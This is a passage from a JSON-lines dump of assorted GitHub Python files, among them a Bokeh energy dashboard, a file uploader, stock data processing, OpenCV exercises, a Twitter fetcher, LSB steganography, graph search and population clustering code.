de vorm {0: '00:00', 1: '00:01', ... t/m 1440 voor alle minuten van de dag.\n # In feite zet deze regel alle minuten van 0 t/m 1440 om in een string met tijd voor de x-as.\n d = {i:f\"{floor(i/60):02d}\" + \":\" + f\"{int(i%60):02d}\" for i in range(1440)}\n \n p = figure(title='Bar chart', x_range=(0, 1440), tools=TOOLS, background_fill_color=\"#fafafa\")\n p.sizing_mode = 'stretch_both' # https://docs.bokeh.org/en/latest/docs/user_guide/layout.html\n p.vbar(x='minutes', bottom=0, top='difference', source=src, width=0.9, color={'field': 'difference', 'transform': color_mapper})\n\n p.y_range.start = 0\n p.xaxis.axis_label = 'Tijd'\n p.xaxis.major_label_overrides = d\n p.yaxis.axis_label = 'Verbruik'\n p.grid.grid_line_color=\"white\"\n return p\n\n def update_radios(attr, old, new):\n \n # Get the selected items for the graph\n # ...\n selected = radio_button_group.active\n \n global usageType\n \n # Koppel de selectie aan de juiste gegevens uit het DataFrame\n if selected == 0:\n usageType = 'gastotalusage'\n p.title.text = 'Gasverbruik per minuut'\n elif selected == 1:\n usageType = 'tariff1totalusage'\n p.title.text = 'Stroomtarief 1 verbruik'\n elif selected == 2:\n usageType = 'tariff2totalusage'\n p.title.text = 'Stroomtarief 2 verbruik'\n elif selected == 3:\n usageType = 'powertotalusage'\n p.title.text = 'Stroomverbruik totaal'\n \n print('Update usageType: ' + str(usageType))\n \n # update data\n new_src = make_dataset(df, usageType=usageType, start=start, stop=stop)\n src.data.update(new_src.data)\n \n def update_start_date(attr, old, new):\n \n print('New start date: ' + str(new))\n \n global start\n start = new\n \n # update data\n new_src = make_dataset(df, usageType=usageType, start=new, stop=stop)\n src.data.update(new_src.data)\n \n def update_end_date(attr, old, new):\n \n print('New stop date: ' + str(new))\n \n global stop\n stop = new\n \n # update data\n new_src = make_dataset(df, usageType=usageType, start=start, stop=new)\n src.data.update(new_src.data)\n\n radio_button_group = RadioButtonGroup(\n labels=[\"Gas\", \"Tarief 1\", \"Tarief 2\", \"Stroom totaal\"], active=0)\n \n radio_button_group.on_change('active', update_radios)\n \n datepicker_start = DatePicker(title='Startdatum',min_date=date(2015,1,1),max_date=date.today())\n datepicker_stop = DatePicker(title='Einddatum',min_date=date(2015,1,1),max_date=date.today())\n \n datepicker_start.on_change('value', update_start_date)\n datepicker_stop.on_change('value', update_end_date)\n \n # initial execution\n src = make_dataset(df, 'gastotalusage')\n p = make_plot(src)\n \n # make a grid\n grid = gridplot([[p],[radio_button_group], [datepicker_start], [datepicker_stop]])\n grid.sizing_mode = 'scale_width'\n \n tab = Panel(child = grid, title = 'Bar chart')\n \n print(\"barchart() uitgevoerd\")\n \n return tab","repo_name":"WouterNieuwerth/Pimatic-Bokeh-dashboard-v2","sub_path":"scripts/barchart_datepicker.py","file_name":"barchart_datepicker.py","file_ext":"py","file_size_in_byte":9786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27573836202","text":"from config import *\nfrom cryptlog import *\nfrom dirscanner import *\nfrom debug import *\nfrom fileinfo import *\n\nclass Uploader(object):\n \"\"\"\n class to process uploads to the CryptStore\n \"\"\"\n\n def __init__(self, cryptstore):\n \"\"\"\n creates an instance\n Parameters:\n - cryptstore\n CryptStore instance to use\n \"\"\"\n self._cryptstore = cryptstore\n\n def _debug(self, action, 
entry, fileinfo):\n        \"\"\"\n        logs debug information\n        Parameters:\n        - action\n          action to log\n        - entry\n          corresponding cryptstore entry\n        - fileinfo\n          corresponding file info\n        \"\"\"\n        debuglog = DebugLogger(\"cryptbox\", \"Uploader\")\n        debuglog.debug_value(\"fileinfo.relative_path\", fileinfo.get_relative_path())\n        debuglog.debug_value(\"fileinfo.exist\", fileinfo.exists())\n        debuglog.debug_value(\"fileinfo.file_timestamp\", fileinfo.get_file_timestamp())\n        debuglog.debug_value(\"fileinfo.state_timestamp\", fileinfo.get_state_timestamp())\n        if entry:\n            debuglog.debug_value(\"entry.state\", entry.get_state())\n            debuglog.debug_value(\"entry.timestamp\", entry.get_timestamp())\n        else:\n            debuglog.debug_value(\"entry\", None)\n        debuglog.debug(action)\n\n    \n    def run(self):\n        \"\"\"\n        executes the Uploader\n        \"\"\"\n        self.check_for_delete()\n        self.check_for_upload()\n\n    def check_for_delete(self):\n        \"\"\"\n        check if files should be deleted\n        \"\"\"\n        debuglog = DebugLogger(\"cryptbox\", \"Uploader.check_for_delete\")\n        database = FileInfoDatabase()\n        for fileinfo in database.get_all():\n            fileinfo.scan()\n            if not fileinfo.exists():\n                if fileinfo.get_state() != FILEINFO_STATE_DELETED:\n                    delete_flag = True\n                    filepath = fileinfo.get_relative_path()\n                    file_timestamp = fileinfo.get_state_timestamp()\n                    entry = self._cryptstore.get_entry(filepath)\n                    if entry:\n                        entry_timestamp = entry.get_timestamp()\n                        if entry.get_state() != FILEINFO_STATE_DELETED:\n                            if entry_timestamp > file_timestamp:\n                                self._debug(\"file not deleted\", entry, fileinfo)\n                                delete_flag = False\n                    if delete_flag and entry.get_state() != FILEINFO_STATE_DELETED:\n                        self._debug(\"file deleted\", entry, fileinfo)\n                        self._cryptstore.delete_file(entry)\n                        cryptlog(\"%s deleted.\" % filepath)\n\n    def check_for_upload(self):\n        \"\"\"\n        check if files should be uploaded\n        \"\"\"\n        config = CryptBoxConfig()\n        srcpath = config.get_source_directory()\n        scanner = DirScanner(srcpath)\n        for fileinfo in scanner.get_list().get_entries():\n            upload_flag = False\n            fileinfo.scan()\n            relpath = fileinfo.get_relative_path()\n            storeentry = self._cryptstore.get_entry(relpath)\n            if storeentry:\n                file_timestamp = fileinfo.get_file_timestamp()\n                store_timestamp = storeentry.get_timestamp()\n                if file_timestamp > store_timestamp:\n                    upload_flag = True\n            else:\n                upload_flag = True\n            if upload_flag:\n                self._debug(\"file uploaded\", storeentry, fileinfo)\n                self._cryptstore.upload_file(fileinfo)\n                cryptlog(\"%s uploaded.\" % relpath)\n            else:\n                self._debug(\"no action\", storeentry, fileinfo)\n","repo_name":"joskulj/cryptbox","sub_path":"cryptbox/uploader.py","file_name":"uploader.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"}
+{"seq_id":"32853154884","text":"import sys\ninput = sys.stdin.readline\n\nt = int(input())\nfor _ in range(t):\n    koong = [1, 1, 2, 4]\n    n = int(input())\n    for i in range(4, n+1):\n        koong.append(koong[i-1]+koong[i-2]+koong[i-3]+koong[i-4])\n    print(koong[n])\n","repo_name":"DohyunJegal/Baekjoon","sub_path":"etc/silver/9507.py","file_name":"9507.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"6774928293","text":"# coding=utf-8\n\"\"\"\nDaily stock quotes\ntushare learning: https://tushare.pro/document/1?doc_id=131\nCreated on 2020-02-23\n@author: lizhenkun\n@contact: 1292746975@qq.com\n\"\"\"\nimport os\nimport pandas as pd\n\nts_code='002713.SZ'\ncsv_file = 
'{0}.csv'.format(ts_code)\nreorg_file = 'reorg_{0}.csv'.format(ts_code)\n# print(df)\ndf = pd.read_csv(csv_file)\ndf = df[['trade_date', 'open', 'high', 'low', 'close', 'change']]\ndf.sort_values(by=['trade_date'], inplace=True)\ndf.reset_index(0, drop=True, inplace=True)\n# Compute the change percentage from the closing price\ndf['change'] = df['close'].pct_change(1)\ndf.to_csv(reorg_file, index=False)\nprint(df)\n# df = pd.read_csv(reorg_file)\n# print(df)\n\n","repo_name":"lizhenkun/quant-trade-learning","sub_path":"src/data_crawler/tushare/reorgnize_data.py","file_name":"reorgnize_data.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"38286715467","text":"from paddle import Turtle\n\n\nclass ScoreBoard(Turtle):\n    def __init__(self):\n        super().__init__()\n        self.l_score = 0\n        self.r_right = 0\n        self.color('white')\n        self.penup()\n        self.hideturtle()\n        self.goto(0, 255)\n        self.write(f\"{self.l_score} {self.r_right}\", align='center', font=('Courier', 35, 'normal'))\n\n    def score_lef(self):\n        self.l_score += 1\n        self.clear()\n        self.write(f\"{self.l_score} {self.r_right}\", align='center', font=('Courier', 35, 'normal'))\n\n\n    def score_right(self):\n        self.r_right += 1\n        self.clear()\n        self.write(f\"{self.l_score} {self.r_right}\", align='center', font=('Courier', 35, 'normal'))\n","repo_name":"eyoair21/Python_projects","sub_path":"new_pong/ex_2/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"17960128518","text":"import cv2 \nimport numpy as np\nbasePath = \"Computer-Vision-py/DATA/\"\n\ngiraffes = cv2.imread(basePath + \"giraffes.jpg\")\ngrayGiraffes = cv2.imread(basePath + \"giraffes.jpg\", 0)\n# giaraffes = cv2.cvtColor(giaraffes, c)\ncv2.imshow(\"giraffes\", giraffes)\n\n# 2\nt1, binaryThesh = cv2.threshold(\n    grayGiraffes,\n    giraffes.max() // 2,\n    255,\n    cv2.THRESH_BINARY\n)\ncv2.imshow(\"binaryThresh\", binaryThesh)\n\n# 3\nhsvGiraffes = cv2.cvtColor(giraffes, cv2.COLOR_RGB2HSV)\ncv2.imshow(\"hsvGiraffe\", hsvGiraffes)\n\n# 4\nkernel = np.ones((4,4), np.float32) / 10\nblurredGiraffe = cv2.filter2D(\n    giraffes,\n    -1,\n    kernel\n)\ncv2.imshow(\"blurredGiraffe\", blurredGiraffe)\n\n# 5 \nsobelX = cv2.Sobel(\n    grayGiraffes,\n    cv2.CV_64F,\n    1,\n    0,\n    None,\n    5\n)\ncv2.imshow(\"sobelX\", sobelX)\ncv2.destroyAllWindows() if ( cv2.waitKey(0) & 0xFF == 27 ) else None\n","repo_name":"Abukar-1000/myCompVision","sub_path":"imgProcessing/assessment3.py","file_name":"assessment3.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"18728268854","text":"import unittest\nfrom scripts.transform.create_unique_holders_set import extract_unique_holders \n\n\nclass TestExtractUniqueHolders(unittest.TestCase):\n\n    def test_extract_unique_holders(self):\n        # Define a sample input dictionary\n        holders_data = {\n            'AAPL': {\n                'institutional_holders': [\n                    {'Holder': 'Institution 1'},\n                    {'Holder': 'Institution 2'},\n                    {'Holder': 'Institution 1'},  # Duplicate, should be ignored\n                ],\n                'mutual_fund_holders': [\n                    {'Holder': 'Fund A'},\n                    {'Holder': 'Fund B'},\n                ],\n            },\n            'GOOGL': {\n                'institutional_holders': [\n                    {'Holder': 'Institution 3'},\n                ],\n                'mutual_fund_holders': [],\n            },\n        }\n\n        # Call the function to get the result\n        result = extract_unique_holders(holders_data)\n\n        # Define the expected output based on the sample 
input, sorted alphabetically\n expected_result = [\n {'holder_id': 'h00001', 'holder_name': 'Fund A'},\n {'holder_id': 'h00002', 'holder_name': 'Fund B'},\n {'holder_id': 'h00003', 'holder_name': 'Institution 1'},\n {'holder_id': 'h00004', 'holder_name': 'Institution 2'},\n {'holder_id': 'h00005', 'holder_name': 'Institution 3'},\n ]\n\n # Assert that the result matches the expected output\n self.assertEqual(result, expected_result)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"zabull1/SP500-Companies-ETL-and-Data-Modeling-Project","sub_path":"tests/test_create_unique_holders_set.py","file_name":"test_create_unique_holders_set.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18192181442","text":"import logging\nimport os\nimport urllib3\n\nclass Request():\n def __init__(self, user_agent):\n self.user_agent_ = user_agent\n\n # Request a given uri according to the given method (GET)\n def get(self, resource_uri, decode=True):\n try:\n http = urllib3.PoolManager()\n req = http.request('GET', resource_uri, { 'User-Agent' : self.user_agent_ })\n except:\n logging.error(\"[Http][Request] Unable to GET '%s'\" % (resource_uri))\n raise\n if decode:\n return req.data.decode('utf-8')\n return req.data\n\n def download(self, resource_uri, destination_path):\n data = self.get(resource_uri, decode=False)\n destination_path = str(\"%s/%s\" % (destination_path, os.path.split(resource_uri)[-1]))\n try:\n out = open(destination_path, \"wb\")\n out.write(data)\n except:\n logging.error(\"[Http][Request] Unable to write to '%s'\" % (destination_path))\n raise\n\n","repo_name":"Akkarinn/torrents-grabber","sub_path":"torrent_fetcher/http/Request.py","file_name":"Request.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24863088232","text":"import serial\nfrom pymongo import MongoClient\nfrom datetime import datetime\nimport time\n\ndb_name = 'dust_sensor'\ncollection_name = 'logs' \nmongo_client = MongoClient()\ndb = mongo_client.get_database(db_name)\nusb_port = '/dev/cu.usbserial-1410'\narduino = serial.Serial(usb_port, 9600, timeout=1)\nwhile True:\n\trawdata = str(arduino.readline())\n\tif('Dust Density' in rawdata):\n\t\tdust_input = rawdata.split(':')\n\t\tinput_db = dust_input[1].split('\\\\')\n\t\tinput_db = input_db[0]\n\t\tcurrent_time = datetime.now()\n\t\tprint(input_db)\n\t\tinsert_date = current_time.strftime('%H:%M:%S %d/%m/%Y')\n\t\tobj = {\n\t\t\t\"time\": insert_date,\n\t\t\t\"density\": str(input_db)\n\t\t}\n\t\tprint(obj)\n\t\tdb[collection_name].insert_one(obj)\n","repo_name":"qngdt/dust-sensor-app","sub_path":"uno_reader/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12390782114","text":"def getDataBits(data):\n bits = []\n for byte in data:\n for b in range(0, 8):\n bits.append((byte >> b) & 0b1)\n return bits\n\n\ndef putDataInsideImage(im, data):\n dataBits = getDataBits(data)\n\n maxX = im.size[0] # width of the image\n maxY = im.size[1] # height of the image\n maxC = len(im.getpixel((0, 0))) # number of channels in the image\n\n x = 0 # x coordinate of the pixel\n y = 0 # y coordinate of the pixel\n c = 0 # color channel of the pixel\n\n for bit in dataBits:\n color = list(im.getpixel((x, y)))\n color[c] = (color[c] & 
(~0b1)) | bit\n im.putpixel((x, y), tuple(color))\n\n c += 1 # we first iterate through the color channel\n if c >= maxC:\n c = 0\n x = x + 1 # then through the x coordinate\n if x >= maxX:\n x = 0\n y = y + 1 # and finally through the y coordinate\n if y >= maxY:\n print(\"Not enough pixels!\")\n return\n","repo_name":"Habiba1234567/hiding-text-in-an-image","sub_path":"src/encode/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44311268992","text":"import socket\n\nHEADERSIZE = 10\n\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nprint(\"enter your IP and PORT\")\ns.connect((input(),int(input())))\n\nwhile True:\n \n full_msg=\"\"\n \n new_msg = True \n while True:\n msg = s.recv(16)\n if new_msg:\n msg_len = int(msg[:HEADERSIZE])\n new_msg = False\n \n full_msg += msg.decode(\"utf-8\")\n \n if len(full_msg)-HEADERSIZE==msg_len:\n print(\"recieved\")\n print(full_msg[HEADERSIZE:])\n new_msg = True\n full_msg = \"\"\n while True:\n g = input()\n s.send(bytes(f\"{len(g):<{HEADERSIZE}}\"+g,\"utf-8\"))\n","repo_name":"TathagataRoy1278/Controllinator","sub_path":"clien.py","file_name":"clien.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6251987047","text":"from src.bipolar_aba import BipolarABA, Rule, NonBipolarException\nfrom unittest import TestCase\nimport pytest\n\n\nclass TestBipolarABAcreation(TestCase):\n def setUp(self):\n self.assumptions = {'alpha', 'beta', 'gamma', 'delta'}\n self.language = self.assumptions.union({'phi', 'psi', 'chi'})\n self.assumptions_to_contrary_mapping = {'alpha': 'beta', 'beta': 'phi', 'gamma': 'beta', 'delta': 'chi'}\n\n rule_1 = Rule('alpha', 'phi')\n rule_2 = Rule('gamma', 'beta')\n rule_3 = Rule('delta', 'chi')\n rule_4 = Rule('alpha', 'chi')\n\n self.rules = {rule_1, rule_2, rule_3, rule_4}\n\n def test_valid_bipolar_aba_framework_creation(self):\n\n bipolar_aba_framework = BipolarABA(self.language, self.rules, self.assumptions,\n self.assumptions_to_contrary_mapping)\n assert bipolar_aba_framework.language == self.language\n assert bipolar_aba_framework.rules == self.rules\n assert bipolar_aba_framework.assumptions == self.assumptions\n\n def test_framework_creation_with_invalid_rule_head_throws_exception(self):\n\n rule_5 = Rule('alpha', 'psi')\n\n self.rules.add(rule_5)\n\n with pytest.raises(NonBipolarException) as e:\n BipolarABA(self.language, self.rules, self.assumptions, self.assumptions_to_contrary_mapping)\n assert str(e.value) == \"The head of a rule in a BipolarABA framework must be an assumption or \" \\\n \"the contrary of an assumption.\"\n\n def test_framework_creation_with_non_assumption_in_rule_body_throws_exception(self):\n\n rule_5 = Rule('psi', 'gamma')\n\n self.rules.add(rule_5)\n\n with pytest.raises(NonBipolarException) as e:\n BipolarABA(self.language, self.rules, self.assumptions, self.assumptions_to_contrary_mapping)\n assert str(e.value) == \"The body of a rule in a BipolarABA framework can only contain assumptions.\"\n\n def test_assumption_not_in_language_throws_exception(self):\n\n self.assumptions.add('Not in language')\n self.assumptions_to_contrary_mapping['Not in language'] = 'beta'\n\n with pytest.raises(NonBipolarException) as e:\n BipolarABA(self.language, self.rules, self.assumptions, self.assumptions_to_contrary_mapping)\n assert str(e.value) == \"Assumptions 
and contraries in a BipolarABA framework should be part of the language.\"\n\n def test_mapping_not_total_throws_exception(self):\n\n self.assumptions.add('Not in language')\n\n with pytest.raises(NonBipolarException) as e:\n BipolarABA(self.language, self.rules, self.assumptions, self.assumptions_to_contrary_mapping)\n assert str(e.value) == \"Assumption to contrary mapping must be a total mapping on assumptions.\"\n\n def test_contrary_not_in_language_throws_exception(self):\n\n self.assumptions.add('new')\n self.language.add('new')\n self.assumptions_to_contrary_mapping['new'] = 'Not in language'\n\n with pytest.raises(NonBipolarException) as e:\n BipolarABA(self.language, self.rules, self.assumptions, self.assumptions_to_contrary_mapping)\n assert str(e.value) == \"Assumptions and contraries in a BipolarABA framework should be part of the language.\"\n\n\nclass TestExtensionCalculation(TestCase):\n def setUp(self):\n self.assumptions = {'alpha', 'beta', 'gamma', 'delta'}\n self.language = self.assumptions.union({'phi', 'psi', 'chi'})\n self.assumptions_to_contrary_mapping = {'alpha': 'beta', 'beta': 'phi', 'gamma': 'psi', 'delta': 'chi'}\n\n rule_1 = Rule('alpha', 'phi')\n rule_2 = Rule('gamma', 'beta')\n rule_3 = Rule('delta', 'chi')\n rule_4 = Rule('alpha', 'chi')\n\n self.rules = {rule_1, rule_2, rule_3, rule_4}\n\n self.bipolar_aba_framework = BipolarABA(self.language, self.rules, self.assumptions,\n self.assumptions_to_contrary_mapping)\n\n def test_simple_preferred_extension_calculation(self):\n preferred_extensions = list(self.bipolar_aba_framework.get_preferred_extensions())\n assert {'beta', 'gamma'} in preferred_extensions\n assert {'alpha'} in preferred_extensions\n assert len(preferred_extensions) == 2\n\n def test_simple_set_stable_extension_calculation(self):\n set_stable_extensions = list(self.bipolar_aba_framework.get_set_stable_extensions())\n assert {'alpha'} in set_stable_extensions\n assert len(set_stable_extensions) == 1\n","repo_name":"AminKaramlou/BipolarABASolver","sub_path":"tests/run_on_ci/test_bipolar_aba.py","file_name":"test_bipolar_aba.py","file_ext":"py","file_size_in_byte":4530,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"8018324441","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport tweepy \r\nimport urllib\r\n\r\n\r\n#Twitter API credentials\r\nconsumer_key = \"\"\r\nconsumer_secret = \"\"\r\naccess_key = \"\"\r\naccess_secret = \"\"\r\n\r\n\r\ndef get_all_tweets(account_name):\r\n\r\n #authorization\r\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n auth.set_access_token(access_key, access_secret)\r\n api = tweepy.API(auth)\r\n \r\n #get 20 tweets of user\r\n alltweets = []\r\n new_tweets = api.user_timeline(screen_name = account_name,count=20)\r\n alltweets.extend(new_tweets)\r\n\r\n #save user tweets and picture\r\n picSet = []\r\n textSet= []\r\n for status in alltweets:\r\n #text\r\n textSet.append(status.text)\r\n #picture\r\n mediaData = status.entities.get('media',[])\r\n if(len(mediaData) == 0):\r\n picSet.append('')\r\n else: \r\n \tpicSet.append(mediaData[0]['media_url'])\r\n\r\n #print(textSet)\r\n #print(picSet)\r\n\r\n\r\n #download image \r\n index = 0 \r\n cnt = 0\r\n for pic in picSet:\r\n if pic != '':\r\n cnt = cnt+1\r\n urllib.request.urlretrieve(pic,\"./picsTweet/pic%03d.jpg\"%index)\r\n index = index +1 \r\n if cnt == 0:\r\n print(\"No picture in this account!\")\r\n\r\n print(\"Finished Loading!!\") \r\n allSet = []\r\n 
allSet.append(textSet)\r\n allSet.append(picSet)\r\n return allSet\r\n\r\ndef getUserTwAPI(account_name):\r\n try:\r\n get_all_tweets(account_name)\r\n return(\"success!\")\r\n except Exception:\r\n print(\"The account is invalid!!\")\r\n \r\n \r\n\r\nif __name__ == '__main__': \r\n getUserTwAPI(\"@AnimalPlanet\")\r\n\r\n","repo_name":"BUEC500C1/twitter-summarizer-Bonniesty","sub_path":"getUserTwAPI.py","file_name":"getUserTwAPI.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14127427352","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits import mplot3d # noqa: F401\n\nimport pyk4a\nfrom pyk4a import Config, PyK4A\n\n\ndef main():\n k4a = PyK4A(\n Config(\n color_resolution=pyk4a.ColorResolution.RES_720P,\n camera_fps=pyk4a.FPS.FPS_5,\n depth_mode=pyk4a.DepthMode.WFOV_2X2BINNED,\n synchronized_images_only=True,\n )\n )\n k4a.start()\n\n # getters and setters directly get and set on device\n k4a.whitebalance = 4500\n assert k4a.whitebalance == 4500\n k4a.whitebalance = 4510\n assert k4a.whitebalance == 4510\n while True:\n capture = k4a.get_capture()\n if np.any(capture.depth) and np.any(capture.color):\n break\n while True:\n capture = k4a.get_capture()\n if np.any(capture.depth) and np.any(capture.color):\n break\n points = capture.depth_point_cloud.reshape((-1, 3))\n colors = capture.transformed_color[..., (2, 1, 0)].reshape((-1, 3))\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection=\"3d\")\n ax.scatter(\n points[:, 0],\n points[:, 1],\n points[:, 2],\n s=1,\n c=colors / 255,\n )\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n ax.set_zlabel(\"z\")\n ax.set_xlim(-2000, 2000)\n ax.set_ylim(-2000, 2000)\n ax.set_zlim(0, 4000)\n ax.view_init(elev=-90, azim=-90)\n plt.show()\n\n k4a.stop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"etiennedub/pyk4a","sub_path":"example/viewer_point_cloud.py","file_name":"viewer_point_cloud.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":276,"dataset":"github-code","pt":"76"} +{"seq_id":"19872637962","text":"# Pranjali Shinde(TA63) - Experiment 1: DFS & BFS\r\n\r\nfrom collections import deque\r\n\r\n\r\ndef main():\r\n numVertices = int(input(\"Enter the number of vertices: \"))\r\n adjacencyMatrix = [[0] * (numVertices + 1) for _ in range(numVertices + 1)]\r\n\r\n for i in range(1, numVertices + 1):\r\n for j in range(1, numVertices + 1):\r\n adjacencyMatrix[i][j] = int(\r\n input(f\"Enter 1 if 'Node {i}' has an edge with 'Node {j}', else enter 0: \"))\r\n\r\n while True:\r\n visited = [0] * (numVertices + 1)\r\n\r\n print(\"\\nMENU\")\r\n print(\"1. Depth First Search (DFS)\")\r\n print(\"2. Breadth First Search (BFS)\")\r\n choice = int(input(\"Enter your choice: \"))\r\n startVertex = int(input(\"Enter the Source Vertex: \"))\r\n\r\n if choice == 1:\r\n depthFirstSearch(adjacencyMatrix, visited,\r\n startVertex, numVertices)\r\n elif choice == 2:\r\n breadthFirstSearch(adjacencyMatrix, startVertex, numVertices)\r\n\r\n cont = input(\"\\nDO YOU WANT TO CONTINUE (Y/N)? 
\").strip().lower()\r\n if cont != 'y':\r\n break\r\n\r\n\r\ndef depthFirstSearch(adjacencyMatrix, visited, currentVertex, numVertices):\r\n print(currentVertex, end=\" \")\r\n visited[currentVertex] = 1\r\n for i in range(1, numVertices + 1):\r\n if adjacencyMatrix[currentVertex][i] != 0 and visited[i] == 0:\r\n depthFirstSearch(adjacencyMatrix, visited, i, numVertices)\r\n\r\n\r\ndef breadthFirstSearch(adjacencyMatrix, startVertex, numVertices):\r\n visited = [0] * (numVertices + 1)\r\n vertexQueue = deque([startVertex])\r\n visited[startVertex] = 1\r\n\r\n while vertexQueue:\r\n currentVertex = vertexQueue.popleft()\r\n print(currentVertex, end=\" \")\r\n for i in range(1, numVertices + 1):\r\n if adjacencyMatrix[currentVertex][i] != 0 and visited[i] == 0:\r\n visited[i] = 1\r\n vertexQueue.append(i)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"shindepranjal/Artificial-Intelligence","sub_path":"AI_1.py","file_name":"AI_1.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"3062080076","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 14 12:11:08 2019\r\nThis Module is useed for creating the clusters on the Grid.\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport geopandas as gpd\r\nfrom scipy.spatial import cKDTree\r\nimport itertools\r\n\r\n\r\ndef nearest(df,geom_union,nearest_point,Year,Pop_in_Clus,Flag=False):\r\n btree = cKDTree(geom_union)\r\n dist, idx = btree.query(geom_union,k=nearest_point)\r\n #dist=np.delete(dist,(0),axis=1).ravel()\r\n idx=np.delete(idx,(np.arange(nearest_point-1)),axis=1).ravel()\r\n df1 = pd.DataFrame.from_dict({'nearest_id' : df.loc[idx, 'cluster_id'].values, \"{}{}\".format(Year,'_pop_2'): df.loc[idx, Year+'_pop_1'].values })\r\n df=pd.concat([df,df1],axis=1)\r\n df['Merge_pop']=df[Year+'_pop_1']+df[Year+'_pop_2']\r\n df['clus_near']=df.apply(addcolumn,Year=Year,Pop_in_Clus=Pop_in_Clus,axis=1)\r\n df1=df.groupby('clus_near').size().reset_index(name='count')\r\n df=pd.merge(df,df1,on='clus_near')\r\n if Flag==True:\r\n df=brute_near(df,Year,Pop_in_Clus)\r\n #df['nearest_id']=np.where(df['Merge_pop']<=10000,df['nearest_id'],'NOT')\r\n df['nearest_id']=df.apply(lambda row:row['nearest_id'] if (row['Merge_pop']<=Pop_in_Clus and row['count']==2) else 'NOT',axis=1)\r\n df.drop([Year+'_pop_2','Merge_pop','count','clus_near'],axis=1,inplace=True)\r\n return df\r\n\r\n\r\ndef brute_near(df,Year,Pop_in_Clus):\r\n serviced_cluster=[]\r\n for index in df.index:\r\n if df.at[index,'count']==1 and df.at[index,'Merge_pop']<=Pop_in_Clus and df.at[index,'cluster_id'] not in serviced_cluster:\r\n nearest_point=df.at[index,'nearest_id']\r\n pop_2=df.at[index, Year+'_pop_2']\r\n merge_pop=df.at[index,'Merge_pop']\r\n clus_near=df.at[index,'clus_near']\r\n serviced_cluster.append(df.at[index,'cluster_id'])\r\n df.at[df['cluster_id']==nearest_point, Year+'_pop_2']=pop_2\r\n df.at[df['cluster_id']==nearest_point,'Merge_pop']=merge_pop\r\n df.at[df['cluster_id']==nearest_point,'clus_near']=clus_near\r\n df.at[df['cluster_id']==nearest_point,'nearest_id']=df.at[index,'cluster_id']\r\n serviced_cluster.append(nearest_point)\r\n df.drop('count',axis=1,inplace=True)\r\n df1=df.groupby('clus_near').size().reset_index(name='count')\r\n df1=pd.merge(df,df1,on='clus_near')\r\n return df1\r\n\r\n\r\ndef addcolumn(row,Year,Pop_in_Clus):\r\n if row[Year+'_pop_1']<=Pop_in_Clus and row['nearest_id']!='NOT':\r\n 
ls=[str(row['cluster_id']),str(row['nearest_id'])]\r\n ls=list(set(itertools.chain.from_iterable(el.split('_') for el in ls)))\r\n ls=list(map(int,ls))\r\n ls.sort()\r\n ls='_'.join(map(str, ls))\r\n return ls\r\n return(str(row['cluster_id']))\r\n\r\ndef Cluster_creation(Malawi_pop,near_point,clus_size,Year, Pop_in_Clus):\r\n Malawi_pop.sort_values('Grid_index',inplace=True)\r\n Malawi_pop.reset_index(drop=True,inplace=True)\r\n Malawi_pop.reset_index(level=0,inplace=True)\r\n Malawi_pop.rename(columns={'index':'cluster_id'},inplace=True)\r\n Malawi_prep=Malawi_pop[['cluster_id','2020_pop_1', '2021_pop_1', '2022_pop_1', '2023_pop_1', 'geometry']]\r\n nearest_point=2\r\n Flag=False\r\n while(Malawi_prep.shape[0]>clus_size and nearest_point<=near_point):\r\n Malawi_prep['Centroid']=Malawi_prep.geometry.centroid\r\n geom_union=list(zip(Malawi_prep.set_geometry('Centroid').geometry.x,Malawi_prep.set_geometry('Centroid').geometry.y))\r\n Malawi_chk=nearest(Malawi_prep,geom_union,nearest_point,Year,Pop_in_Clus,Flag)\r\n 